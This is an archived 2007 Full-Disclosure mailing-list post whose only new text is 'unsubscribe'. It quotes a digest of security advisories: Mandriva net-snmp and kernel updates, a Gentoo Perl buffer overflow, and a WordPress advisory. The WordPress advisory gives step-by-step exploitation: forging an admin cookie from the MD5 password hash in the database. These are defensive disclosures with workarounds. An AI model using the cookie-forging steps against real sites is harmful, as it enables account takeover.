| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 26 Nov 2007 18:54:01 +0100
From: "LT" <lt@....hush.com>
To: <full-disclosure@...ts.grok.org.uk>
Cc:
Subject: unsubscribe
On Tue, 20 Nov 2007 08:54:18 +0100 full-disclosure-
request@...ts.grok.org.uk wrote:
>Send Full-Disclosure mailing list submissions to
> full-disclosure@...ts.grok.org.uk
>
>To subscribe or unsubscribe via the World Wide Web, visit
> https://lists.grok.org.uk/mailman/listinfo/full-disclosure
>or, via email, send a message with subject or body 'help' to
> full-disclosure-request@...ts.grok.org.uk
>
>You can reach the person managing the list at
> full-disclosure-owner@...ts.grok.org.uk
>
>When replying, please edit your Subject line so it is more
>specific
>than "Re: Contents of Full-Disclosure digest..."
>
>
>Note to digest recipients - when replying to digest posts, please
>trim your post appropriately. Thank you.
>
>
>Today's Topics:
>
> 1. [ MDKSA-2007:225 ] - Updated net-snmp packages fix remote
> denial of service vulnerability (security@...driva.com)
> 2. Wordpress Cookie Authentication Vulnerability (Steven J.
>Murdoch)
> 3. [ GLSA 200711-28 ] Perl: Buffer overflow (Pierre-Yves Rofes)
> 4. [ MDKSA-2007:226 ] - Updated kernel packages fix multiple
> vulnerabilities and bugs (security@...driva.com)
> 5. H2HC Materials (Rodrigo Rubira Branco (BSDaemon))
> 6. rPSA-2007-0242-1 php5 php5-cgi php5-mysql php5-pear
> php5-pgsql php5-soap php5-xsl (rPath Update Announcements)
> 7. Multiple stack-based buffer overflows in dxmsft.dll (Elazar
>Broad)
> 8. [ MDKSA-2007:227 ] - Updated poppler packages fix
> vulnerabilities (security@...driva.com)
> 9. [ MDKSA-2007:228 ] - Updated cups packages fix
> vulnerabilities (security@...driva.com)
> 10. Tha Manual. (rchrafe)
> 11. The Call to Reason (rchrafe)
> 12. Re: How to become a Computer Security Professional ?
>(rchrafe)
> 13. Re: How to become a Computer Security Professional ?
>(rchrafe)
> 14. Re: How to become a Computer Security Professional ?
>(rchrafe)
> 15. Large Scale MySpace Phishing Attack (Dancho Danchev)
> 16. Re: Multiple stack-based buffer overflows in dxmsft.dll
> (Elazar Broad)
> 17. Re: so gay huh? (rchrafe)
> 18. Re: so gay huh? (rchrafe)
>
>
>-------------------------------------------------------------------
>---
>
>Message: 1
>Date: Mon, 19 Nov 2007 11:12:22 -0700
>From: security@...driva.com
>Subject: [Full-disclosure] [ MDKSA-2007:225 ] - Updated net-snmp
> packages fix remote denial of service vulnerability
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <E1IuB6c-0001Xp-Fv@...emis.annvix.ca>
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>
__________________________________________________________________
>_____
>
> Mandriva Linux Security Advisory MDKSA-
>2007:225
> http://www.mandriva.com/security/
>
__________________________________________________________________
>_____
>
> Package : net-snmp
> Date : November 19, 2007
> Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0,
> Multi Network Firewall 2.0
>
__________________________________________________________________
>_____
>
> Problem Description:
>
> The SNMP agent in net-snmp 5.4.1 and earlier allows remote
>attackers to
> cause a denial of service (CPU and memory consumption) via a
>GETBULK
> request with a large max-repeaters value.
>
> Updated packages fix this issue.
>
__________________________________________________________________
>_____
>
> References:
>
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5846
>
__________________________________________________________________
>_____
>
> Updated Packages:
>
> Mandriva Linux 2007.0:
> 83e0d0edc66af5d11b032cf2a7c12054 2007.0/i586/libnet-snmp10-5.3.1-
>2.1mdv2007.0.i586.rpm
> 211db38ffbbefb22f653a18da8e928f5 2007.0/i586/libnet-snmp10-devel-
>5.3.1-2.1mdv2007.0.i586.rpm
> b43cc33ca2b0fb582e69bbe52578e76a 2007.0/i586/libnet-snmp10-
>static-devel-5.3.1-2.1mdv2007.0.i586.rpm
> e2ac837cd1eff29bb56f5fa964f59ed5 2007.0/i586/net-snmp-5.3.1-
>2.1mdv2007.0.i586.rpm
> 2434602e5d0a3133318600b4071cf4ea 2007.0/i586/net-snmp-mibs-5.3.1-
>2.1mdv2007.0.i586.rpm
> d9336d2710c1a44531cdb790cd8f47cf 2007.0/i586/net-snmp-trapd-
>5.3.1-2.1mdv2007.0.i586.rpm
> a1945889589568b420181a8a196d51ad 2007.0/i586/net-snmp-utils-
>5.3.1-2.1mdv2007.0.i586.rpm
> cf8fd2357e80a805ab3210fd3a8f8d01 2007.0/i586/perl-NetSNMP-5.3.1-
>2.1mdv2007.0.i586.rpm
> da66327183a153d054bbc5d70fde958c 2007.0/SRPMS/net-snmp-5.3.1-
>2.1mdv2007.0.src.rpm
>
> Mandriva Linux 2007.0/X86_64:
> 7a4a25157d9a1e3b9cf4bf7af1205aa8 2007.0/x86_64/lib64net-snmp10-
>5.3.1-2.1mdv2007.0.x86_64.rpm
> cab6a3e8bc7167656e38e5a429eb8c0a 2007.0/x86_64/lib64net-snmp10-
>devel-5.3.1-2.1mdv2007.0.x86_64.rpm
> 03f09f4fe99c381bda2603861f9644a2 2007.0/x86_64/lib64net-snmp10-
>static-devel-5.3.1-2.1mdv2007.0.x86_64.rpm
> 425489fcb707757a46e0c6105309e2ff 2007.0/x86_64/net-snmp-5.3.1-
>2.1mdv2007.0.x86_64.rpm
> 7df1fa9a564c63687621355561ba9eec 2007.0/x86_64/net-snmp-mibs-
>5.3.1-2.1mdv2007.0.x86_64.rpm
> fe2aaae5507ae5122a7d30f9fd74eef5 2007.0/x86_64/net-snmp-trapd-
>5.3.1-2.1mdv2007.0.x86_64.rpm
> ee1ae1d56af4b511b3bb2b1a986aa60a 2007.0/x86_64/net-snmp-utils-
>5.3.1-2.1mdv2007.0.x86_64.rpm
> 04393ea88742f3b05586a555d8ad81ec 2007.0/x86_64/perl-NetSNMP-
>5.3.1-2.1mdv2007.0.x86_64.rpm
> da66327183a153d054bbc5d70fde958c 2007.0/SRPMS/net-snmp-5.3.1-
>2.1mdv2007.0.src.rpm
>
> Mandriva Linux 2007.1:
> fa0f200cd711f97684d9debfdeef3e15 2007.1/i586/libnet-snmp10-5.3.1-
>3.1mdv2007.1.i586.rpm
> 68c25bedfd4370a5fc0aa5ff934a2b1b 2007.1/i586/libnet-snmp10-devel-
>5.3.1-3.1mdv2007.1.i586.rpm
> ecbd2c76a1ea3595594f10c66bea5772 2007.1/i586/libnet-snmp10-
>static-devel-5.3.1-3.1mdv2007.1.i586.rpm
> 04c676ae1290bbfbd7083252ae5b10dd 2007.1/i586/net-snmp-5.3.1-
>3.1mdv2007.1.i586.rpm
> 2a6c6befd5958c7c9c946d2189d2f128 2007.1/i586/net-snmp-mibs-5.3.1-
>3.1mdv2007.1.i586.rpm
> 5cd1e27c1af30157ead213324c440527 2007.1/i586/net-snmp-trapd-
>5.3.1-3.1mdv2007.1.i586.rpm
> 423682a7f455940da49272647925838e 2007.1/i586/net-snmp-utils-
>5.3.1-3.1mdv2007.1.i586.rpm
> 1ca18897188b7a34d98b146d65746477 2007.1/i586/perl-NetSNMP-5.3.1-
>3.1mdv2007.1.i586.rpm
> f2a3a8df265da917384a4c0916b330a6 2007.1/SRPMS/net-snmp-5.3.1-
>3.1mdv2007.1.src.rpm
>
> Mandriva Linux 2007.1/X86_64:
> 9cdea571a84945accd6d38527b1bedb5 2007.1/x86_64/lib64net-snmp10-
>5.3.1-3.1mdv2007.1.x86_64.rpm
> 8352cb8ef1fac035ea009d696e1d5837 2007.1/x86_64/lib64net-snmp10-
>devel-5.3.1-3.1mdv2007.1.x86_64.rpm
> 5e54dd10e2f97bd2ee23f0a715ef734e 2007.1/x86_64/lib64net-snmp10-
>static-devel-5.3.1-3.1mdv2007.1.x86_64.rpm
> 3187463725a5b015d3f507ac4a723160 2007.1/x86_64/net-snmp-5.3.1-
>3.1mdv2007.1.x86_64.rpm
> 638d8c0a5d4be46ee1b9c2640ed7a061 2007.1/x86_64/net-snmp-mibs-
>5.3.1-3.1mdv2007.1.x86_64.rpm
> c4f41ebf9bf64dfc5236bb935ee16c31 2007.1/x86_64/net-snmp-trapd-
>5.3.1-3.1mdv2007.1.x86_64.rpm
> 734133a9a7a860f90b76c8bd72a0ddd0 2007.1/x86_64/net-snmp-utils-
>5.3.1-3.1mdv2007.1.x86_64.rpm
> b1f5da81f1c27888df5ba8f71279fb05 2007.1/x86_64/perl-NetSNMP-
>5.3.1-3.1mdv2007.1.x86_64.rpm
> f2a3a8df265da917384a4c0916b330a6 2007.1/SRPMS/net-snmp-5.3.1-
>3.1mdv2007.1.src.rpm
>
> Corporate 3.0:
> 748009feee8a9d4d904b7e77537ff791 corporate/3.0/i586/libnet-snmp5-
>5.1-7.3.C30mdk.i586.rpm
> 8ca0b75c8ec8e0839ae37335b04629ab corporate/3.0/i586/libnet-snmp5-
>devel-5.1-7.3.C30mdk.i586.rpm
> a0c2d416faa87c016826b5f8616c3af3 corporate/3.0/i586/libnet-snmp5-
>static-devel-5.1-7.3.C30mdk.i586.rpm
> 99659604d3f40d23179b2b3138178e41 corporate/3.0/i586/net-snmp-5.1-
>7.3.C30mdk.i586.rpm
> 3f9e8c99d31dd0dd0d3e5364325370ac corporate/3.0/i586/net-snmp-
>mibs-5.1-7.3.C30mdk.i586.rpm
> 6bf842fa5664b91062fc74fac450aa90 corporate/3.0/i586/net-snmp-
>trapd-5.1-7.3.C30mdk.i586.rpm
> ced36508ad4a349cf945d62823b556d5 corporate/3.0/i586/net-snmp-
>utils-5.1-7.3.C30mdk.i586.rpm
> d8da239034cf799078cc3df5c5646501 corporate/3.0/SRPMS/net-snmp-
>5.1-7.3.C30mdk.src.rpm
>
> Corporate 3.0/X86_64:
> d3f097f7389841deb188d7353c5fdf5c corporate/3.0/x86_64/lib64net-
>snmp5-5.1-7.3.C30mdk.x86_64.rpm
> b53aea1a27f1c5a1e5515abb31ac70b0 corporate/3.0/x86_64/lib64net-
>snmp5-devel-5.1-7.3.C30mdk.x86_64.rpm
> a910dfbb95c2dd8fe70ce1c62e743c03 corporate/3.0/x86_64/lib64net-
>snmp5-static-devel-5.1-7.3.C30mdk.x86_64.rpm
> bfe1ba7a83f9afcacd9273eb6ebbd538 corporate/3.0/x86_64/net-snmp-
>5.1-7.3.C30mdk.x86_64.rpm
> b6e7b70f0d7549f44850834b2542fb8f corporate/3.0/x86_64/net-snmp-
>mibs-5.1-7.3.C30mdk.x86_64.rpm
> a5ab3548c27e86789e41248ab53e4982 corporate/3.0/x86_64/net-snmp-
>trapd-5.1-7.3.C30mdk.x86_64.rpm
> 3c57bfdfa6b4ac44adab12bda0131a2f corporate/3.0/x86_64/net-snmp-
>utils-5.1-7.3.C30mdk.x86_64.rpm
> d8da239034cf799078cc3df5c5646501 corporate/3.0/SRPMS/net-snmp-
>5.1-7.3.C30mdk.src.rpm
>
> Corporate 4.0:
> 0fac46c024f1cb4a8be101e69a942233 corporate/4.0/i586/libnet-snmp5-
>5.2.1.2-5.1.20060mlcs4.i586.rpm
> 857fcac472ce931834cccde0de2741e4 corporate/4.0/i586/libnet-snmp5-
>devel-5.2.1.2-5.1.20060mlcs4.i586.rpm
> 112cceb5d76947959c251ecb1b157a3e corporate/4.0/i586/libnet-snmp5-
>static-devel-5.2.1.2-5.1.20060mlcs4.i586.rpm
> ecf0b6386447f6442375cb39c60479cd corporate/4.0/i586/net-snmp-
>5.2.1.2-5.1.20060mlcs4.i586.rpm
> 72a4fa1c8af3cc00bfbb3d877d5c329a corporate/4.0/i586/net-snmp-
>mibs-5.2.1.2-5.1.20060mlcs4.i586.rpm
> ab9ceaa6d9df42f687fe0c6790a2d266 corporate/4.0/i586/net-snmp-
>trapd-5.2.1.2-5.1.20060mlcs4.i586.rpm
> c66e13b576028690583f0fa2318bee3f corporate/4.0/i586/net-snmp-
>utils-5.2.1.2-5.1.20060mlcs4.i586.rpm
> 8aeab0a22ec99e5cde40593c883415aa corporate/4.0/i586/perl-NetSNMP-
>5.2.1.2-5.1.20060mlcs4.i586.rpm
> b42c3b00b13c6cc458a0435dd4c7ff71 corporate/4.0/SRPMS/net-snmp-
>5.2.1.2-5.1.20060mlcs4.src.rpm
>
> Corporate 4.0/X86_64:
> 3bb05138c10885baa4db145f2ae6c726 corporate/4.0/x86_64/lib64net-
>snmp5-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
> 2ef53cc96353eefb27abf76bc83bd35f corporate/4.0/x86_64/lib64net-
>snmp5-devel-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
> 14ce1bda23212a415cbdcc43b46813c2 corporate/4.0/x86_64/lib64net-
>snmp5-static-devel-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
> f6e393154ee66701b8fb5d848aeb3d7e corporate/4.0/x86_64/net-snmp-
>5.2.1.2-5.1.20060mlcs4.x86_64.rpm
> 77fcaeda03c9bed289ba9a7a6cc1ca48 corporate/4.0/x86_64/net-snmp-
>mibs-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
> e40ea44f385c0c92961fb11fa4013c02 corporate/4.0/x86_64/net-snmp-
>trapd-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
> 537f8597086053c4d5a56ebd7d35b9e3 corporate/4.0/x86_64/net-snmp-
>utils-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
> 51b4c70346529ba7a88de89543d16040 corporate/4.0/x86_64/perl-
>NetSNMP-5.2.1.2-5.1.20060mlcs4.x86_64.rpm
> b42c3b00b13c6cc458a0435dd4c7ff71 corporate/4.0/SRPMS/net-snmp-
>5.2.1.2-5.1.20060mlcs4.src.rpm
>
> Multi Network Firewall 2.0:
> 9210aef172a538942f490c89afb4022b mnf/2.0/i586/libnet-snmp5-5.1-
>7.3.M20mdk.i586.rpm
> 844c7d5cb0cec99e3cab16792cb7766e mnf/2.0/SRPMS/net-snmp-5.1-
>7.3.M20mdk.src.rpm
>
__________________________________________________________________
>_____
>
> To upgrade automatically use MandrivaUpdate or urpmi. The
>verification
> of md5 checksums and GPG signatures is performed automatically
>for you.
>
> All packages are signed by Mandriva for security. You can obtain
>the
> GPG public key of the Mandriva Security Team by executing:
>
> gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
>
> You can view other update advisories for Mandriva Linux at:
>
> http://www.mandriva.com/security/advisories
>
> If you want to report vulnerabilities, please contact
>
> security_(at)_mandriva.com
>
__________________________________________________________________
>_____
>
> Type Bits/KeyID Date User ID
> pub 1024D/22458A98 2000-07-10 Mandriva Security Team
> <security*mandriva.com>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.7 (GNU/Linux)
>
>iD8DBQFHQaYcmqjQ0CJFipgRAtwPAKDBmKLrILjPOlBxv0HLu3YwQxbjFACfVRZM
>+tyjwf62Xh9rba65JnJ1RtU=
>=zmEd
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 2
>Date: Mon, 19 Nov 2007 18:46:37 +0000
>From: "Steven J. Murdoch" <fulldisc+Steven.Murdoch@...cam.ac.uk>
>Subject: [Full-disclosure] Wordpress Cookie Authentication
> Vulnerability
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <20071119184637.GJ1043@...n.cl.cam.ac.uk>
>Content-Type: text/plain; charset="us-ascii"
>
>Wordpress Cookie Authentication Vulnerability
>
>Original release date: 2007-11-19
>Last revised: 2007-11-19
>Latest version:
>http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-
>auth.txt
>CVE ID: <pending>
>Source: Steven J. Murdoch <http://www.cl.cam.ac.uk/users/sjm217/>
>
>
>Systems Affected:
>
> Wordpress 1.5 -- 2.3.1 (including current version, as of 2007-11-
>19)
>
>
>Overview:
>
> With read-only access to the Wordpress database, it is possible
>to
> generate a valid login cookie for any account, without resorting
>to a
> brute force attack. This allows a limited SQL injection
>vulnerability
> to be escalated into administrator access.
>
> This vulnerability is known to be actively exploited, hence the
> expedited public release.
>
>
>I. Description
>
> For authentication, the Wordpress user database stores the MD5
>hash
> of login passwords. A client is permitted access if they can
>present a
> password whose hash matches the stored one.
>
> $ mysql -u wordpress -p wordpress
> Enter password: ********
>
> mysql> SELECT ID, user_login, user_pass FROM wp_users;
> +----+-------------+----------------------------------+
> | ID | user_login | user_pass |
> +----+-------------+----------------------------------+
> | 1 | admin | 4cee2c84f6de6d89a4db4f2894d14e38 |
> ...
>
> Of course, entering your password after each action that requires
> authorization would be exceptionally tedious. So, after logging
>in,
> Wordpress presents the client with two cookies:
>
> wordpressuser_6092254072ca971c70b3ff302411aa5f=admin
>
>wordpresspass_6092254072ca971c70b3ff302411aa5f=813cadd8658c4776afbe
>5de8f304a684
>
> The cookie names contains the MD5 hash (6092...1a5f) of the blog
>URL.
> The value of wordpressuser_... is the login name, and the value
>of
> wordpresspass is the double-MD5 hash of the user password.
>
> Wordpress will permit access to a given user account if the
> wordpressuserpass_... cookie matches the hash of the specified
>user's
> wp_users.user_pass database entry.
>
> In other words, the database contains MD5(password) and the
>cookie
> contains MD5(MD5(password)). It is thus trivial to convert a
>database
> entry into an authentication cookie.
>
> At this point the vulnerability should be clear. If an attacker
>can
> gain read access to the wp_user table, for example due to a
>publicly
> visible backup or SQL injection vulnerability, a valid cookie can
>be
> generated for any account.
>
> This applies even if the user's password is sufficiently complex
>to
> resist brute force and rainbow table attacks. While it should be
> computationally infeasible to go backwards from MD5(password) to
> password, the attacker needs only to go forwards.
>
> The exploitation steps are therefore:
> 1) Find the hash of the blog URL: Either just look at the URL,
>or
> create an account to get a user cookie
> 2) Read the user_pass entry from wp_users table: Look for
> backups, perform SQL injection, etc...
> 3) Set the following cookies:
> wordpressuser_<MD5(url)>=admin
> wordpresspass_<MD5(url)>=MD5(user_pass)
> 4) You have admin access to the blog
>
>
>II. Impact
>
> A remote attacker, with read access to the password database can
>gain
> administrator rights. This may be used in conjunction with an SQL
> injection attack, or after locating a database backup.
>
> An attacker who has alternatively compromised the database of one
> Wordpress blog can also gain access to any other whose users have
>the
> same password on both.
>
>
>III. Solution
>
> No vendor patch is available.
> No timeline for a vendor patch has been announced.
>
> Workarounds:
>
> - Protect the Wordpress database, and do not allow backups to be
> released.
> - Keep your Wordpress installation up to date. This should reduce
>the
> risk that your database will be compromised.
> - Do not share passwords across different sites.
> - If you suspect a database to be compromised, change all
>passwords
> to different ones. It is not adequate to change the passwords
>to
> the same ones, since Wordpress does not "salt" [1] the password
> database.
> - Remove write permissions on the Wordpress files for the system
> account that the webserver runs as. This will disable the theme
> editor, but make it more difficult to escalate Wordpress
> administrator access into the capability to execute arbitrary
>code
> - Configure the webserver to not execute files in any directory
> writable by the webserver system account (e.g. the upload
> directory).
>
> Potential fixes:
>
> The problem occurs because it is easy to go from the password
>hash
> in the database to a cookie (i.e the application of MD5 is the
>wrong
> way around). The simplest fix is to store MD5(MD5(password)) in
>the
> database, and make the cookie MD5(password). This still makes it
> infeasible to retrieve the password from a cookie, but means
>that it
> is also infeasible to generate a valid cookie from the database
> entry.
>
> However, there are other vulnerabilities in the Wordpress cookie
>and
> password handling, which should be resolved too:
>
> - Passwords are unsalted [2], leaving them open to brute force,
>rainbow
> table and other attacks [3].
> - It is impossible to revoke a cookie without changing the
>user's
> password.
> - Cookies do not contain an expiry time, so are always valid
>(until
> the user's password changes)
> - There ought to be an option to limit cookies to a particular
> IP address or range.
>
>
>References:
>
> [1] http://en.wikipedia.org/wiki/Salt_(cryptography)
> [2] http://trac.wordpress.org/ticket/2394
> [3] http://www.lightbluetouchpaper.org/2007/11/16/google-as-a-
>password-cracker/
>
>
>Timeline:
>
> 2007-10-29: security@...dpress.org notified; no response
> 2007-11-02: security@...dpress.org notified;
> Confirmation of active exploitation requested by
>Wordpress
> 2007-11-02: Confirmation sent; no response
> 2007-11-19: Advisory released to full-disclosure and BugTraq
>
>--
>w: http://www.cl.cam.ac.uk/users/sjm217/
>-------------- next part --------------
>A non-text attachment was scrubbed...
>Name: not available
>Type: application/pgp-signature
>Size: 189 bytes
>Desc: not available
>Url : http://lists.grok.org.uk/pipermail/full-
>disclosure/attachments/20071119/f87361fa/attachment-0001.bin
>
>------------------------------
>
>Message: 3
>Date: Mon, 19 Nov 2007 22:10:42 +0100
>From: Pierre-Yves Rofes <py@...too.org>
>Subject: [Full-disclosure] [ GLSA 200711-28 ] Perl: Buffer
>overflow
>To: gentoo-announce@...too.org
>Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
> security-alerts@...uxsecurity.com
>Message-ID: <4741FBD2.5040609@...too.org>
>Content-Type: text/plain; charset=ISO-8859-1
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> - - -
>Gentoo Linux Security Advisory GLSA
>200711-28
>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> - - -
>
>http://security.gentoo.org/
>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> - - -
>
> Severity: Normal
> Title: Perl: Buffer overflow
> Date: November 19, 2007
> Bugs: #198196
> ID: 200711-28
>
>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> - - -
>
>Synopsis
>========
>
>A buffer overflow in the Regular Expression engine in Perl
>possibly
>allows for the execution of arbitrary code.
>
>Background
>==========
>
>Perl is a stable, cross-platform programming language created by
>Larry
>Wall.
>
>Affected packages
>=================
>
> ---------------------------------------------------------------
>----
> Package / Vulnerable /
>Unaffected
> ---------------------------------------------------------------
>----
> 1 dev-lang/perl < 5.8.8-r4 >=
>5.8.8-r4
>
>Description
>===========
>
>Tavis Ormandy and Will Drewry (Google Security Team) discovered a
>heap-based buffer overflow in the Regular Expression engine
>(regcomp.c)
>that occurs when switching from byte to Unicode (UTF-8) characters
>in a
>regular expression.
>
>Impact
>======
>
>A remote attacker could either entice a user to compile a
>specially
>crafted regular expression or actively compile it in case the
>script
>accepts remote input of regular expressions, possibly leading to
>the
>execution of arbitrary code with the privileges of the user
>running
>Perl.
>
>Workaround
>==========
>
>There is no known workaround at this time.
>
>Resolution
>==========
>
>All Perl users should upgrade to the latest version:
>
> # emerge --sync
> # emerge --ask --oneshot --verbose ">=dev-lang/perl-5.8.8-r4"
>
>References
>==========
>
> [ 1 ] CVE-2007-5116
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-
>5116
>
>Availability
>============
>
>This GLSA and any updates to it are available for viewing at
>the Gentoo Security Website:
>
> http://security.gentoo.org/glsa/glsa-200711-28.xml
>
>Concerns?
>=========
>
>Security is a primary focus of Gentoo Linux and ensuring the
>confidentiality and security of our users machines is of utmost
>importance to us. Any security concerns should be addressed to
>security@...too.org or alternatively, you may file a bug at
>http://bugs.gentoo.org.
>
>License
>=======
>
>Copyright 2007 Gentoo Foundation, Inc; referenced text
>belongs to its owner(s).
>
>The contents of this document are licensed under the
>Creative Commons - Attribution / Share Alike license.
>
>http://creativecommons.org/licenses/by-sa/2.5
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.7 (GNU/Linux)
>Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
>
>iD8DBQFHQfvSuhJ+ozIKI5gRAvsEAJ4xdMYdYOWV1neFOchsoCtz3sUtGwCggFQg
>RVShInUYsQgHfjeb1K1xnE4=
>=wi9y
>-----END PGP SIGNATURE-----
>
>
>
>------------------------------
>
>Message: 4
>Date: Mon, 19 Nov 2007 16:41:14 -0700
>From: security@...driva.com
>Subject: [Full-disclosure] [ MDKSA-2007:226 ] - Updated kernel
> packages fix multiple vulnerabilities and bugs
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <E1IuGEs-0007rF-PH@...emis.annvix.ca>
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>
__________________________________________________________________
>_____
>
> Mandriva Linux Security Advisory MDKSA-
>2007:226
> http://www.mandriva.com/security/
>
__________________________________________________________________
>_____
>
> Package : kernel
> Date : November 19, 2007
> Affected: 2008.0
>
__________________________________________________________________
>_____
>
> Problem Description:
>
> Some vulnerabilities were discovered and corrected in the Linux
> 2.6 kernel:
>
> The minix filesystem code allows local users to cause a denial of
> service (hang) via a malformed minix file stream (CVE-2006-6058).
>
> An integer underflow in the Linux kernel prior to 2.6.23 allows
>remote
> attackers to cause a denial of service (crash) via a crafted SKB
>length
> value in a runt IEEE 802.11 frame when the
>IEEE80211_STYPE_QOS_DATA
> flag is set (CVE-2007-4997).
>
> To update your kernel, please follow the directions located at:
>
> http://www.mandriva.com/en/security/kernelupdate
>
__________________________________________________________________
>_____
>
> References:
>
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6058
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4997
>
__________________________________________________________________
>_____
>
> Updated Packages:
>
> Mandriva Linux 2008.0:
> bfb8abfb7532255d239ce8ef3b39966b 2008.0/i586/kernel-2.6.22.9-
>2mdv-1-1mdv2008.0.i586.rpm
> c68305809aa8704146ea1a59cd687ab1 2008.0/i586/kernel-desktop-
>2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
> 89a439f86bd47820345287275fe25674 2008.0/i586/kernel-desktop-
>devel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
> a13eab853fc0b044456d90d98c8e9008 2008.0/i586/kernel-desktop-
>devel-latest-2.6.22.9-2mdv2008.0.i586.rpm
> 229f00634e286da1ab490678cf201dab 2008.0/i586/kernel-desktop-
>latest-2.6.22.9-2mdv2008.0.i586.rpm
> e77c3f728f0ba5bf8491e27ef389df8c 2008.0/i586/kernel-desktop586-
>2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
> 82d8110dc838a1a25b2d4de0e94872e3 2008.0/i586/kernel-desktop586-
>devel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
> 0be66b6c155ff5888900f784bf21f555 2008.0/i586/kernel-desktop586-
>devel-latest-2.6.22.9-2mdv2008.0.i586.rpm
> 48976bcfb3ecd30b2c2a671e49f2d241 2008.0/i586/kernel-desktop586-
>latest-2.6.22.9-2mdv2008.0.i586.rpm
> 372de082e77dec0e87d93f389bff76cf 2008.0/i586/kernel-doc-2.6.22.9-
>2mdv2008.0.i586.rpm
> 8fb68460352343d0c14b3d2c5581375f 2008.0/i586/kernel-laptop-
>2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
> 0c76031c7eb78ba7da93b83ebf531541 2008.0/i586/kernel-laptop-devel-
>2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
> 059f66f5340e538dda3d748276313975 2008.0/i586/kernel-laptop-devel-
>latest-2.6.22.9-2mdv2008.0.i586.rpm
> 4d6c700c736a476718c809fb3a470ed9 2008.0/i586/kernel-laptop-
>latest-2.6.22.9-2mdv2008.0.i586.rpm
> 57e0382893adc64445913de674815ad5 2008.0/i586/kernel-server-
>2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
> f2ea96b6c7f83f8de0f27dc1c2ea9193 2008.0/i586/kernel-server-devel-
>2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
> 4de3613951fda9c4c92fcb35fe743a04 2008.0/i586/kernel-server-devel-
>latest-2.6.22.9-2mdv2008.0.i586.rpm
> 4cc8313e4fed4a1a966bc4f4d0819f71 2008.0/i586/kernel-server-
>latest-2.6.22.9-2mdv2008.0.i586.rpm
> a30a7a388cdcdf089c39f7a7c26e34f0 2008.0/i586/kernel-source-
>2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
> 5b919908b67f94571a4851caf08e8ece 2008.0/i586/kernel-source-
>latest-2.6.22.9-2mdv2008.0.i586.rpm
> 6e797fd0fea50e2b0290ca082ca9c1db 2008.0/SRPMS/kernel-2.6.22.9-
>2mdv2007.0.src.rpm
>
> Mandriva Linux 2008.0/X86_64:
> d30b2a76ab4e37f296f07380fa8d41a4 2008.0/x86_64/kernel-2.6.22.9-
>2mdv-1-1mdv2008.0.x86_64.rpm
> 3cdbd2356b7400f831a8b759d13952ec 2008.0/x86_64/kernel-desktop-
>2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
> a60abdec0274a9f96be2fb1117eb2f4a 2008.0/x86_64/kernel-desktop-
>devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
> 272ac8a552c99a1b72303a92f474d46f 2008.0/x86_64/kernel-desktop-
>devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
> 8c78406bc678b51a4c84526b0874703e 2008.0/x86_64/kernel-desktop-
>latest-2.6.22.9-2mdv2008.0.x86_64.rpm
> 8447a07d292dd930bba13a6d06bf6570 2008.0/x86_64/kernel-doc-
>2.6.22.9-2mdv2008.0.x86_64.rpm
> 546663f7f08a1ed4a0e561c06960872e 2008.0/x86_64/kernel-laptop-
>2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
> 482b6130e1695693ebfd610aade49255 2008.0/x86_64/kernel-laptop-
>devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
> 280678d50696a95f56735ad91fcc92ef 2008.0/x86_64/kernel-laptop-
>devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
> f4fedb72b7d286f9b9dae772b8251a7a 2008.0/x86_64/kernel-laptop-
>latest-2.6.22.9-2mdv2008.0.x86_64.rpm
> c811160740d5c4e138430fb757803bcc 2008.0/x86_64/kernel-server-
>2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
> 1078b15d6cb4a1c420e7212d4a7ca545 2008.0/x86_64/kernel-server-
